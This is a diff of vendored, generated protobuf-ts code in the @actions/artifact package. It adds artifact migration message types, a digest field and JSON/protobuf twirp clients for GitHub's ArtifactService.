declare class FinalizeMigratedArtifactRequest$Type extends MessageType<FinalizeMigratedArtifactRequest> {
|
||||||
|
constructor();
|
||||||
|
create(value?: PartialMessage<FinalizeMigratedArtifactRequest>): FinalizeMigratedArtifactRequest;
|
||||||
|
internalBinaryRead(reader: IBinaryReader, length: number, options: BinaryReadOptions, target?: FinalizeMigratedArtifactRequest): FinalizeMigratedArtifactRequest;
|
||||||
|
internalBinaryWrite(message: FinalizeMigratedArtifactRequest, writer: IBinaryWriter, options: BinaryWriteOptions): IBinaryWriter;
|
||||||
|
}
|
||||||
|
/**
|
||||||
|
* @generated MessageType for protobuf message github.actions.results.api.v1.FinalizeMigratedArtifactRequest
|
||||||
|
*/
|
||||||
|
export declare const FinalizeMigratedArtifactRequest: FinalizeMigratedArtifactRequest$Type;
|
||||||
|
declare class FinalizeMigratedArtifactResponse$Type extends MessageType<FinalizeMigratedArtifactResponse> {
|
||||||
|
constructor();
|
||||||
|
create(value?: PartialMessage<FinalizeMigratedArtifactResponse>): FinalizeMigratedArtifactResponse;
|
||||||
|
internalBinaryRead(reader: IBinaryReader, length: number, options: BinaryReadOptions, target?: FinalizeMigratedArtifactResponse): FinalizeMigratedArtifactResponse;
|
||||||
|
internalBinaryWrite(message: FinalizeMigratedArtifactResponse, writer: IBinaryWriter, options: BinaryWriteOptions): IBinaryWriter;
|
||||||
|
}
|
||||||
|
/**
|
||||||
|
* @generated MessageType for protobuf message github.actions.results.api.v1.FinalizeMigratedArtifactResponse
|
||||||
|
*/
|
||||||
|
export declare const FinalizeMigratedArtifactResponse: FinalizeMigratedArtifactResponse$Type;
|
||||||
declare class CreateArtifactRequest$Type extends MessageType<CreateArtifactRequest> {
|
declare class CreateArtifactRequest$Type extends MessageType<CreateArtifactRequest> {
|
||||||
constructor();
|
constructor();
|
||||||
create(value?: PartialMessage<CreateArtifactRequest>): CreateArtifactRequest;
|
create(value?: PartialMessage<CreateArtifactRequest>): CreateArtifactRequest;
|
||||||
|
|||||||
245
node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.js
generated
vendored
245
node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.js
generated
vendored
@@ -1,6 +1,6 @@
|
|||||||
"use strict";
|
"use strict";
|
||||||
Object.defineProperty(exports, "__esModule", { value: true });
|
Object.defineProperty(exports, "__esModule", { value: true });
|
||||||
exports.ArtifactService = exports.DeleteArtifactResponse = exports.DeleteArtifactRequest = exports.GetSignedArtifactURLResponse = exports.GetSignedArtifactURLRequest = exports.ListArtifactsResponse_MonolithArtifact = exports.ListArtifactsResponse = exports.ListArtifactsRequest = exports.FinalizeArtifactResponse = exports.FinalizeArtifactRequest = exports.CreateArtifactResponse = exports.CreateArtifactRequest = void 0;
|
exports.ArtifactService = exports.DeleteArtifactResponse = exports.DeleteArtifactRequest = exports.GetSignedArtifactURLResponse = exports.GetSignedArtifactURLRequest = exports.ListArtifactsResponse_MonolithArtifact = exports.ListArtifactsResponse = exports.ListArtifactsRequest = exports.FinalizeArtifactResponse = exports.FinalizeArtifactRequest = exports.CreateArtifactResponse = exports.CreateArtifactRequest = exports.FinalizeMigratedArtifactResponse = exports.FinalizeMigratedArtifactRequest = exports.MigrateArtifactResponse = exports.MigrateArtifactRequest = void 0;
|
||||||
// @generated by protobuf-ts 2.9.1 with parameter long_type_string,client_none,generate_dependencies
|
// @generated by protobuf-ts 2.9.1 with parameter long_type_string,client_none,generate_dependencies
|
||||||
// @generated from protobuf file "results/api/v1/artifact.proto" (package "github.actions.results.api.v1", syntax proto3)
|
// @generated from protobuf file "results/api/v1/artifact.proto" (package "github.actions.results.api.v1", syntax proto3)
|
||||||
// tslint:disable
|
// tslint:disable
|
||||||
@@ -14,6 +14,236 @@ const wrappers_1 = require("../../../google/protobuf/wrappers");
|
|||||||
const wrappers_2 = require("../../../google/protobuf/wrappers");
|
const wrappers_2 = require("../../../google/protobuf/wrappers");
|
||||||
const timestamp_1 = require("../../../google/protobuf/timestamp");
|
const timestamp_1 = require("../../../google/protobuf/timestamp");
|
||||||
// @generated message type with reflection information, may provide speed optimized methods
|
// @generated message type with reflection information, may provide speed optimized methods
|
||||||
|
class MigrateArtifactRequest$Type extends runtime_5.MessageType {
|
||||||
|
constructor() {
|
||||||
|
super("github.actions.results.api.v1.MigrateArtifactRequest", [
|
||||||
|
{ no: 1, name: "workflow_run_backend_id", kind: "scalar", T: 9 /*ScalarType.STRING*/ },
|
||||||
|
{ no: 2, name: "name", kind: "scalar", T: 9 /*ScalarType.STRING*/ },
|
||||||
|
{ no: 3, name: "expires_at", kind: "message", T: () => timestamp_1.Timestamp }
|
||||||
|
]);
|
||||||
|
}
|
||||||
|
create(value) {
|
||||||
|
const message = { workflowRunBackendId: "", name: "" };
|
||||||
|
globalThis.Object.defineProperty(message, runtime_4.MESSAGE_TYPE, { enumerable: false, value: this });
|
||||||
|
if (value !== undefined)
|
||||||
|
(0, runtime_3.reflectionMergePartial)(this, message, value);
|
||||||
|
return message;
|
||||||
|
}
|
||||||
|
internalBinaryRead(reader, length, options, target) {
|
||||||
|
let message = target !== null && target !== void 0 ? target : this.create(), end = reader.pos + length;
|
||||||
|
while (reader.pos < end) {
|
||||||
|
let [fieldNo, wireType] = reader.tag();
|
||||||
|
switch (fieldNo) {
|
||||||
|
case /* string workflow_run_backend_id */ 1:
|
||||||
|
message.workflowRunBackendId = reader.string();
|
||||||
|
break;
|
||||||
|
case /* string name */ 2:
|
||||||
|
message.name = reader.string();
|
||||||
|
break;
|
||||||
|
case /* google.protobuf.Timestamp expires_at */ 3:
|
||||||
|
message.expiresAt = timestamp_1.Timestamp.internalBinaryRead(reader, reader.uint32(), options, message.expiresAt);
|
||||||
|
break;
|
||||||
|
default:
|
||||||
|
let u = options.readUnknownField;
|
||||||
|
if (u === "throw")
|
||||||
|
throw new globalThis.Error(`Unknown field ${fieldNo} (wire type ${wireType}) for ${this.typeName}`);
|
||||||
|
let d = reader.skip(wireType);
|
||||||
|
if (u !== false)
|
||||||
|
(u === true ? runtime_2.UnknownFieldHandler.onRead : u)(this.typeName, message, fieldNo, wireType, d);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return message;
|
||||||
|
}
|
||||||
|
internalBinaryWrite(message, writer, options) {
|
||||||
|
/* string workflow_run_backend_id = 1; */
|
||||||
|
if (message.workflowRunBackendId !== "")
|
||||||
|
writer.tag(1, runtime_1.WireType.LengthDelimited).string(message.workflowRunBackendId);
|
||||||
|
/* string name = 2; */
|
||||||
|
if (message.name !== "")
|
||||||
|
writer.tag(2, runtime_1.WireType.LengthDelimited).string(message.name);
|
||||||
|
/* google.protobuf.Timestamp expires_at = 3; */
|
||||||
|
if (message.expiresAt)
|
||||||
|
timestamp_1.Timestamp.internalBinaryWrite(message.expiresAt, writer.tag(3, runtime_1.WireType.LengthDelimited).fork(), options).join();
|
||||||
|
let u = options.writeUnknownFields;
|
||||||
|
if (u !== false)
|
||||||
|
(u == true ? runtime_2.UnknownFieldHandler.onWrite : u)(this.typeName, message, writer);
|
||||||
|
return writer;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
/**
|
||||||
|
* @generated MessageType for protobuf message github.actions.results.api.v1.MigrateArtifactRequest
|
||||||
|
*/
|
||||||
|
exports.MigrateArtifactRequest = new MigrateArtifactRequest$Type();
|
||||||
|
// @generated message type with reflection information, may provide speed optimized methods
|
||||||
|
class MigrateArtifactResponse$Type extends runtime_5.MessageType {
|
||||||
|
constructor() {
|
||||||
|
super("github.actions.results.api.v1.MigrateArtifactResponse", [
|
||||||
|
{ no: 1, name: "ok", kind: "scalar", T: 8 /*ScalarType.BOOL*/ },
|
||||||
|
{ no: 2, name: "signed_upload_url", kind: "scalar", T: 9 /*ScalarType.STRING*/ }
|
||||||
|
]);
|
||||||
|
}
|
||||||
|
create(value) {
|
||||||
|
const message = { ok: false, signedUploadUrl: "" };
|
||||||
|
globalThis.Object.defineProperty(message, runtime_4.MESSAGE_TYPE, { enumerable: false, value: this });
|
||||||
|
if (value !== undefined)
|
||||||
|
(0, runtime_3.reflectionMergePartial)(this, message, value);
|
||||||
|
return message;
|
||||||
|
}
|
||||||
|
internalBinaryRead(reader, length, options, target) {
|
||||||
|
let message = target !== null && target !== void 0 ? target : this.create(), end = reader.pos + length;
|
||||||
|
while (reader.pos < end) {
|
||||||
|
let [fieldNo, wireType] = reader.tag();
|
||||||
|
switch (fieldNo) {
|
||||||
|
case /* bool ok */ 1:
|
||||||
|
message.ok = reader.bool();
|
||||||
|
break;
|
||||||
|
case /* string signed_upload_url */ 2:
|
||||||
|
message.signedUploadUrl = reader.string();
|
||||||
|
break;
|
||||||
|
default:
|
||||||
|
let u = options.readUnknownField;
|
||||||
|
if (u === "throw")
|
||||||
|
throw new globalThis.Error(`Unknown field ${fieldNo} (wire type ${wireType}) for ${this.typeName}`);
|
||||||
|
let d = reader.skip(wireType);
|
||||||
|
if (u !== false)
|
||||||
|
(u === true ? runtime_2.UnknownFieldHandler.onRead : u)(this.typeName, message, fieldNo, wireType, d);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return message;
|
||||||
|
}
|
||||||
|
internalBinaryWrite(message, writer, options) {
|
||||||
|
/* bool ok = 1; */
|
||||||
|
if (message.ok !== false)
|
||||||
|
writer.tag(1, runtime_1.WireType.Varint).bool(message.ok);
|
||||||
|
/* string signed_upload_url = 2; */
|
||||||
|
if (message.signedUploadUrl !== "")
|
||||||
|
writer.tag(2, runtime_1.WireType.LengthDelimited).string(message.signedUploadUrl);
|
||||||
|
let u = options.writeUnknownFields;
|
||||||
|
if (u !== false)
|
||||||
|
(u == true ? runtime_2.UnknownFieldHandler.onWrite : u)(this.typeName, message, writer);
|
||||||
|
return writer;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
/**
|
||||||
|
* @generated MessageType for protobuf message github.actions.results.api.v1.MigrateArtifactResponse
|
||||||
|
*/
|
||||||
|
exports.MigrateArtifactResponse = new MigrateArtifactResponse$Type();
|
||||||
|
// @generated message type with reflection information, may provide speed optimized methods
|
||||||
|
class FinalizeMigratedArtifactRequest$Type extends runtime_5.MessageType {
|
||||||
|
constructor() {
|
||||||
|
super("github.actions.results.api.v1.FinalizeMigratedArtifactRequest", [
|
||||||
|
{ no: 1, name: "workflow_run_backend_id", kind: "scalar", T: 9 /*ScalarType.STRING*/ },
|
||||||
|
{ no: 2, name: "name", kind: "scalar", T: 9 /*ScalarType.STRING*/ },
|
||||||
|
{ no: 3, name: "size", kind: "scalar", T: 3 /*ScalarType.INT64*/ }
|
||||||
|
]);
|
||||||
|
}
|
||||||
|
create(value) {
|
||||||
|
const message = { workflowRunBackendId: "", name: "", size: "0" };
|
||||||
|
globalThis.Object.defineProperty(message, runtime_4.MESSAGE_TYPE, { enumerable: false, value: this });
|
||||||
|
if (value !== undefined)
|
||||||
|
(0, runtime_3.reflectionMergePartial)(this, message, value);
|
||||||
|
return message;
|
||||||
|
}
|
||||||
|
internalBinaryRead(reader, length, options, target) {
|
||||||
|
let message = target !== null && target !== void 0 ? target : this.create(), end = reader.pos + length;
|
||||||
|
while (reader.pos < end) {
|
||||||
|
let [fieldNo, wireType] = reader.tag();
|
||||||
|
switch (fieldNo) {
|
||||||
|
case /* string workflow_run_backend_id */ 1:
|
||||||
|
message.workflowRunBackendId = reader.string();
|
||||||
|
break;
|
||||||
|
case /* string name */ 2:
|
||||||
|
message.name = reader.string();
|
||||||
|
break;
|
||||||
|
case /* int64 size */ 3:
|
||||||
|
message.size = reader.int64().toString();
|
||||||
|
break;
|
||||||
|
default:
|
||||||
|
let u = options.readUnknownField;
|
||||||
|
if (u === "throw")
|
||||||
|
throw new globalThis.Error(`Unknown field ${fieldNo} (wire type ${wireType}) for ${this.typeName}`);
|
||||||
|
let d = reader.skip(wireType);
|
||||||
|
if (u !== false)
|
||||||
|
(u === true ? runtime_2.UnknownFieldHandler.onRead : u)(this.typeName, message, fieldNo, wireType, d);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return message;
|
||||||
|
}
|
||||||
|
internalBinaryWrite(message, writer, options) {
|
||||||
|
/* string workflow_run_backend_id = 1; */
|
||||||
|
if (message.workflowRunBackendId !== "")
|
||||||
|
writer.tag(1, runtime_1.WireType.LengthDelimited).string(message.workflowRunBackendId);
|
||||||
|
/* string name = 2; */
|
||||||
|
if (message.name !== "")
|
||||||
|
writer.tag(2, runtime_1.WireType.LengthDelimited).string(message.name);
|
||||||
|
/* int64 size = 3; */
|
||||||
|
if (message.size !== "0")
|
||||||
|
writer.tag(3, runtime_1.WireType.Varint).int64(message.size);
|
||||||
|
let u = options.writeUnknownFields;
|
||||||
|
if (u !== false)
|
||||||
|
(u == true ? runtime_2.UnknownFieldHandler.onWrite : u)(this.typeName, message, writer);
|
||||||
|
return writer;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
/**
|
||||||
|
* @generated MessageType for protobuf message github.actions.results.api.v1.FinalizeMigratedArtifactRequest
|
||||||
|
*/
|
||||||
|
exports.FinalizeMigratedArtifactRequest = new FinalizeMigratedArtifactRequest$Type();
|
||||||
|
// @generated message type with reflection information, may provide speed optimized methods
|
||||||
|
class FinalizeMigratedArtifactResponse$Type extends runtime_5.MessageType {
|
||||||
|
constructor() {
|
||||||
|
super("github.actions.results.api.v1.FinalizeMigratedArtifactResponse", [
|
||||||
|
{ no: 1, name: "ok", kind: "scalar", T: 8 /*ScalarType.BOOL*/ },
|
||||||
|
{ no: 2, name: "artifact_id", kind: "scalar", T: 3 /*ScalarType.INT64*/ }
|
||||||
|
]);
|
||||||
|
}
|
||||||
|
create(value) {
|
||||||
|
const message = { ok: false, artifactId: "0" };
|
||||||
|
globalThis.Object.defineProperty(message, runtime_4.MESSAGE_TYPE, { enumerable: false, value: this });
|
||||||
|
if (value !== undefined)
|
||||||
|
(0, runtime_3.reflectionMergePartial)(this, message, value);
|
||||||
|
return message;
|
||||||
|
}
|
||||||
|
internalBinaryRead(reader, length, options, target) {
|
||||||
|
let message = target !== null && target !== void 0 ? target : this.create(), end = reader.pos + length;
|
||||||
|
while (reader.pos < end) {
|
||||||
|
let [fieldNo, wireType] = reader.tag();
|
||||||
|
switch (fieldNo) {
|
||||||
|
case /* bool ok */ 1:
|
||||||
|
message.ok = reader.bool();
|
||||||
|
break;
|
||||||
|
case /* int64 artifact_id */ 2:
|
||||||
|
message.artifactId = reader.int64().toString();
|
||||||
|
break;
|
||||||
|
default:
|
||||||
|
let u = options.readUnknownField;
|
||||||
|
if (u === "throw")
|
||||||
|
throw new globalThis.Error(`Unknown field ${fieldNo} (wire type ${wireType}) for ${this.typeName}`);
|
||||||
|
let d = reader.skip(wireType);
|
||||||
|
if (u !== false)
|
||||||
|
(u === true ? runtime_2.UnknownFieldHandler.onRead : u)(this.typeName, message, fieldNo, wireType, d);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return message;
|
||||||
|
}
|
||||||
|
internalBinaryWrite(message, writer, options) {
|
||||||
|
/* bool ok = 1; */
|
||||||
|
if (message.ok !== false)
|
||||||
|
writer.tag(1, runtime_1.WireType.Varint).bool(message.ok);
|
||||||
|
/* int64 artifact_id = 2; */
|
||||||
|
if (message.artifactId !== "0")
|
||||||
|
writer.tag(2, runtime_1.WireType.Varint).int64(message.artifactId);
|
||||||
|
let u = options.writeUnknownFields;
|
||||||
|
if (u !== false)
|
||||||
|
(u == true ? runtime_2.UnknownFieldHandler.onWrite : u)(this.typeName, message, writer);
|
||||||
|
return writer;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
/**
|
||||||
|
* @generated MessageType for protobuf message github.actions.results.api.v1.FinalizeMigratedArtifactResponse
|
||||||
|
*/
|
||||||
|
exports.FinalizeMigratedArtifactResponse = new FinalizeMigratedArtifactResponse$Type();
|
||||||
|
// @generated message type with reflection information, may provide speed optimized methods
|
||||||
class CreateArtifactRequest$Type extends runtime_5.MessageType {
|
class CreateArtifactRequest$Type extends runtime_5.MessageType {
|
||||||
constructor() {
|
constructor() {
|
||||||
super("github.actions.results.api.v1.CreateArtifactRequest", [
|
super("github.actions.results.api.v1.CreateArtifactRequest", [
|
||||||
@@ -395,7 +625,8 @@ class ListArtifactsResponse_MonolithArtifact$Type extends runtime_5.MessageType
|
|||||||
{ no: 3, name: "database_id", kind: "scalar", T: 3 /*ScalarType.INT64*/ },
|
{ no: 3, name: "database_id", kind: "scalar", T: 3 /*ScalarType.INT64*/ },
|
||||||
{ no: 4, name: "name", kind: "scalar", T: 9 /*ScalarType.STRING*/ },
|
{ no: 4, name: "name", kind: "scalar", T: 9 /*ScalarType.STRING*/ },
|
||||||
{ no: 5, name: "size", kind: "scalar", T: 3 /*ScalarType.INT64*/ },
|
{ no: 5, name: "size", kind: "scalar", T: 3 /*ScalarType.INT64*/ },
|
||||||
{ no: 6, name: "created_at", kind: "message", T: () => timestamp_1.Timestamp }
|
{ no: 6, name: "created_at", kind: "message", T: () => timestamp_1.Timestamp },
|
||||||
|
{ no: 7, name: "digest", kind: "message", T: () => wrappers_2.StringValue }
|
||||||
]);
|
]);
|
||||||
}
|
}
|
||||||
create(value) {
|
create(value) {
|
||||||
@@ -428,6 +659,9 @@ class ListArtifactsResponse_MonolithArtifact$Type extends runtime_5.MessageType
|
|||||||
case /* google.protobuf.Timestamp created_at */ 6:
|
case /* google.protobuf.Timestamp created_at */ 6:
|
||||||
message.createdAt = timestamp_1.Timestamp.internalBinaryRead(reader, reader.uint32(), options, message.createdAt);
|
message.createdAt = timestamp_1.Timestamp.internalBinaryRead(reader, reader.uint32(), options, message.createdAt);
|
||||||
break;
|
break;
|
||||||
|
case /* google.protobuf.StringValue digest */ 7:
|
||||||
|
message.digest = wrappers_2.StringValue.internalBinaryRead(reader, reader.uint32(), options, message.digest);
|
||||||
|
break;
|
||||||
default:
|
default:
|
||||||
let u = options.readUnknownField;
|
let u = options.readUnknownField;
|
||||||
if (u === "throw")
|
if (u === "throw")
|
||||||
@@ -458,6 +692,9 @@ class ListArtifactsResponse_MonolithArtifact$Type extends runtime_5.MessageType
|
|||||||
/* google.protobuf.Timestamp created_at = 6; */
|
/* google.protobuf.Timestamp created_at = 6; */
|
||||||
if (message.createdAt)
|
if (message.createdAt)
|
||||||
timestamp_1.Timestamp.internalBinaryWrite(message.createdAt, writer.tag(6, runtime_1.WireType.LengthDelimited).fork(), options).join();
|
timestamp_1.Timestamp.internalBinaryWrite(message.createdAt, writer.tag(6, runtime_1.WireType.LengthDelimited).fork(), options).join();
|
||||||
|
/* google.protobuf.StringValue digest = 7; */
|
||||||
|
if (message.digest)
|
||||||
|
wrappers_2.StringValue.internalBinaryWrite(message.digest, writer.tag(7, runtime_1.WireType.LengthDelimited).fork(), options).join();
|
||||||
let u = options.writeUnknownFields;
|
let u = options.writeUnknownFields;
|
||||||
if (u !== false)
|
if (u !== false)
|
||||||
(u == true ? runtime_2.UnknownFieldHandler.onWrite : u)(this.typeName, message, writer);
|
(u == true ? runtime_2.UnknownFieldHandler.onWrite : u)(this.typeName, message, writer);
|
||||||
@@ -699,6 +936,8 @@ exports.ArtifactService = new runtime_rpc_1.ServiceType("github.actions.results.
|
|||||||
{ name: "FinalizeArtifact", options: {}, I: exports.FinalizeArtifactRequest, O: exports.FinalizeArtifactResponse },
|
{ name: "FinalizeArtifact", options: {}, I: exports.FinalizeArtifactRequest, O: exports.FinalizeArtifactResponse },
|
||||||
{ name: "ListArtifacts", options: {}, I: exports.ListArtifactsRequest, O: exports.ListArtifactsResponse },
|
{ name: "ListArtifacts", options: {}, I: exports.ListArtifactsRequest, O: exports.ListArtifactsResponse },
|
||||||
{ name: "GetSignedArtifactURL", options: {}, I: exports.GetSignedArtifactURLRequest, O: exports.GetSignedArtifactURLResponse },
|
{ name: "GetSignedArtifactURL", options: {}, I: exports.GetSignedArtifactURLRequest, O: exports.GetSignedArtifactURLResponse },
|
||||||
{ name: "DeleteArtifact", options: {}, I: exports.DeleteArtifactRequest, O: exports.DeleteArtifactResponse }
|
{ name: "DeleteArtifact", options: {}, I: exports.DeleteArtifactRequest, O: exports.DeleteArtifactResponse },
|
||||||
|
{ name: "MigrateArtifact", options: {}, I: exports.MigrateArtifactRequest, O: exports.MigrateArtifactResponse },
|
||||||
|
{ name: "FinalizeMigratedArtifact", options: {}, I: exports.FinalizeMigratedArtifactRequest, O: exports.FinalizeMigratedArtifactResponse }
|
||||||
]);
|
]);
|
||||||
//# sourceMappingURL=artifact.js.map
|
//# sourceMappingURL=artifact.js.map
|
||||||
2
node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.js.map
generated
vendored
2
node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.js.map
generated
vendored
File diff suppressed because one or more lines are too long
30
node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.twirp-client.d.ts
generated
vendored
Normal file
30
node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.twirp-client.d.ts
generated
vendored
Normal file
@@ -0,0 +1,30 @@
|
|||||||
|
import { CreateArtifactRequest, CreateArtifactResponse, FinalizeArtifactRequest, FinalizeArtifactResponse, ListArtifactsRequest, ListArtifactsResponse, GetSignedArtifactURLRequest, GetSignedArtifactURLResponse, DeleteArtifactRequest, DeleteArtifactResponse } from "./artifact";
|
||||||
|
interface Rpc {
|
||||||
|
request(service: string, method: string, contentType: "application/json" | "application/protobuf", data: object | Uint8Array): Promise<object | Uint8Array>;
|
||||||
|
}
|
||||||
|
export interface ArtifactServiceClient {
|
||||||
|
CreateArtifact(request: CreateArtifactRequest): Promise<CreateArtifactResponse>;
|
||||||
|
FinalizeArtifact(request: FinalizeArtifactRequest): Promise<FinalizeArtifactResponse>;
|
||||||
|
ListArtifacts(request: ListArtifactsRequest): Promise<ListArtifactsResponse>;
|
||||||
|
GetSignedArtifactURL(request: GetSignedArtifactURLRequest): Promise<GetSignedArtifactURLResponse>;
|
||||||
|
DeleteArtifact(request: DeleteArtifactRequest): Promise<DeleteArtifactResponse>;
|
||||||
|
}
|
||||||
|
export declare class ArtifactServiceClientJSON implements ArtifactServiceClient {
|
||||||
|
private readonly rpc;
|
||||||
|
constructor(rpc: Rpc);
|
||||||
|
CreateArtifact(request: CreateArtifactRequest): Promise<CreateArtifactResponse>;
|
||||||
|
FinalizeArtifact(request: FinalizeArtifactRequest): Promise<FinalizeArtifactResponse>;
|
||||||
|
ListArtifacts(request: ListArtifactsRequest): Promise<ListArtifactsResponse>;
|
||||||
|
GetSignedArtifactURL(request: GetSignedArtifactURLRequest): Promise<GetSignedArtifactURLResponse>;
|
||||||
|
DeleteArtifact(request: DeleteArtifactRequest): Promise<DeleteArtifactResponse>;
|
||||||
|
}
|
||||||
|
export declare class ArtifactServiceClientProtobuf implements ArtifactServiceClient {
|
||||||
|
private readonly rpc;
|
||||||
|
constructor(rpc: Rpc);
|
||||||
|
CreateArtifact(request: CreateArtifactRequest): Promise<CreateArtifactResponse>;
|
||||||
|
FinalizeArtifact(request: FinalizeArtifactRequest): Promise<FinalizeArtifactResponse>;
|
||||||
|
ListArtifacts(request: ListArtifactsRequest): Promise<ListArtifactsResponse>;
|
||||||
|
GetSignedArtifactURL(request: GetSignedArtifactURLRequest): Promise<GetSignedArtifactURLResponse>;
|
||||||
|
DeleteArtifact(request: DeleteArtifactRequest): Promise<DeleteArtifactResponse>;
|
||||||
|
}
|
||||||
|
export {};
|
||||||
100
node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.twirp-client.js
generated
vendored
Normal file
100
node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.twirp-client.js
generated
vendored
Normal file
@@ -0,0 +1,100 @@
|
|||||||
|
"use strict";
|
||||||
|
Object.defineProperty(exports, "__esModule", { value: true });
|
||||||
|
exports.ArtifactServiceClientProtobuf = exports.ArtifactServiceClientJSON = void 0;
|
||||||
|
const artifact_1 = require("./artifact");
|
||||||
|
class ArtifactServiceClientJSON {
|
||||||
|
constructor(rpc) {
|
||||||
|
this.rpc = rpc;
|
||||||
|
this.CreateArtifact.bind(this);
|
||||||
|
this.FinalizeArtifact.bind(this);
|
||||||
|
this.ListArtifacts.bind(this);
|
||||||
|
this.GetSignedArtifactURL.bind(this);
|
||||||
|
this.DeleteArtifact.bind(this);
|
||||||
|
}
|
||||||
|
CreateArtifact(request) {
|
||||||
|
const data = artifact_1.CreateArtifactRequest.toJson(request, {
|
||||||
|
useProtoFieldName: true,
|
||||||
|
emitDefaultValues: false,
|
||||||
|
});
|
||||||
|
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "CreateArtifact", "application/json", data);
|
||||||
|
return promise.then((data) => artifact_1.CreateArtifactResponse.fromJson(data, {
|
||||||
|
ignoreUnknownFields: true,
|
||||||
|
}));
|
||||||
|
}
|
||||||
|
FinalizeArtifact(request) {
|
||||||
|
const data = artifact_1.FinalizeArtifactRequest.toJson(request, {
|
||||||
|
useProtoFieldName: true,
|
||||||
|
emitDefaultValues: false,
|
||||||
|
});
|
||||||
|
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "FinalizeArtifact", "application/json", data);
|
||||||
|
return promise.then((data) => artifact_1.FinalizeArtifactResponse.fromJson(data, {
|
||||||
|
ignoreUnknownFields: true,
|
||||||
|
}));
|
||||||
|
}
|
||||||
|
ListArtifacts(request) {
|
||||||
|
const data = artifact_1.ListArtifactsRequest.toJson(request, {
|
||||||
|
useProtoFieldName: true,
|
||||||
|
emitDefaultValues: false,
|
||||||
|
});
|
||||||
|
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "ListArtifacts", "application/json", data);
|
||||||
|
return promise.then((data) => artifact_1.ListArtifactsResponse.fromJson(data, { ignoreUnknownFields: true }));
|
||||||
|
}
|
||||||
|
GetSignedArtifactURL(request) {
|
||||||
|
const data = artifact_1.GetSignedArtifactURLRequest.toJson(request, {
|
||||||
|
useProtoFieldName: true,
|
||||||
|
emitDefaultValues: false,
|
||||||
|
});
|
||||||
|
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "GetSignedArtifactURL", "application/json", data);
|
||||||
|
return promise.then((data) => artifact_1.GetSignedArtifactURLResponse.fromJson(data, {
|
||||||
|
ignoreUnknownFields: true,
|
||||||
|
}));
|
||||||
|
}
|
||||||
|
DeleteArtifact(request) {
|
||||||
|
const data = artifact_1.DeleteArtifactRequest.toJson(request, {
|
||||||
|
useProtoFieldName: true,
|
||||||
|
emitDefaultValues: false,
|
||||||
|
});
|
||||||
|
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "DeleteArtifact", "application/json", data);
|
||||||
|
return promise.then((data) => artifact_1.DeleteArtifactResponse.fromJson(data, {
|
||||||
|
ignoreUnknownFields: true,
|
||||||
|
}));
|
||||||
|
}
|
||||||
|
}
|
||||||
|
exports.ArtifactServiceClientJSON = ArtifactServiceClientJSON;
|
||||||
|
class ArtifactServiceClientProtobuf {
|
||||||
|
constructor(rpc) {
|
||||||
|
this.rpc = rpc;
|
||||||
|
this.CreateArtifact.bind(this);
|
||||||
|
this.FinalizeArtifact.bind(this);
|
||||||
|
this.ListArtifacts.bind(this);
|
||||||
|
this.GetSignedArtifactURL.bind(this);
|
||||||
|
this.DeleteArtifact.bind(this);
|
||||||
|
}
|
||||||
|
CreateArtifact(request) {
|
||||||
|
const data = artifact_1.CreateArtifactRequest.toBinary(request);
|
||||||
|
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "CreateArtifact", "application/protobuf", data);
|
||||||
|
return promise.then((data) => artifact_1.CreateArtifactResponse.fromBinary(data));
|
||||||
|
}
|
||||||
|
FinalizeArtifact(request) {
|
||||||
|
const data = artifact_1.FinalizeArtifactRequest.toBinary(request);
|
||||||
|
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "FinalizeArtifact", "application/protobuf", data);
|
||||||
|
return promise.then((data) => artifact_1.FinalizeArtifactResponse.fromBinary(data));
|
||||||
|
}
|
||||||
|
ListArtifacts(request) {
|
||||||
|
const data = artifact_1.ListArtifactsRequest.toBinary(request);
|
||||||
|
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "ListArtifacts", "application/protobuf", data);
|
||||||
|
return promise.then((data) => artifact_1.ListArtifactsResponse.fromBinary(data));
|
||||||
|
}
|
||||||
|
GetSignedArtifactURL(request) {
|
||||||
|
const data = artifact_1.GetSignedArtifactURLRequest.toBinary(request);
|
||||||
|
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "GetSignedArtifactURL", "application/protobuf", data);
|
||||||
|
return promise.then((data) => artifact_1.GetSignedArtifactURLResponse.fromBinary(data));
|
||||||
|
}
|
||||||
|
DeleteArtifact(request) {
|
||||||
|
const data = artifact_1.DeleteArtifactRequest.toBinary(request);
|
||||||
|
const promise = this.rpc.request("github.actions.results.api.v1.ArtifactService", "DeleteArtifact", "application/protobuf", data);
|
||||||
|
return promise.then((data) => artifact_1.DeleteArtifactResponse.fromBinary(data));
|
||||||
|
}
|
||||||
|
}
|
||||||
|
exports.ArtifactServiceClientProtobuf = ArtifactServiceClientProtobuf;
|
||||||
|
//# sourceMappingURL=artifact.twirp-client.js.map
|
||||||
1
node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.twirp-client.js.map
generated
vendored
Normal file
1
node_modules/@actions/artifact/lib/generated/results/api/v1/artifact.twirp-client.js.map
generated
vendored
Normal file
@@ -0,0 +1 @@
|
|||||||
|
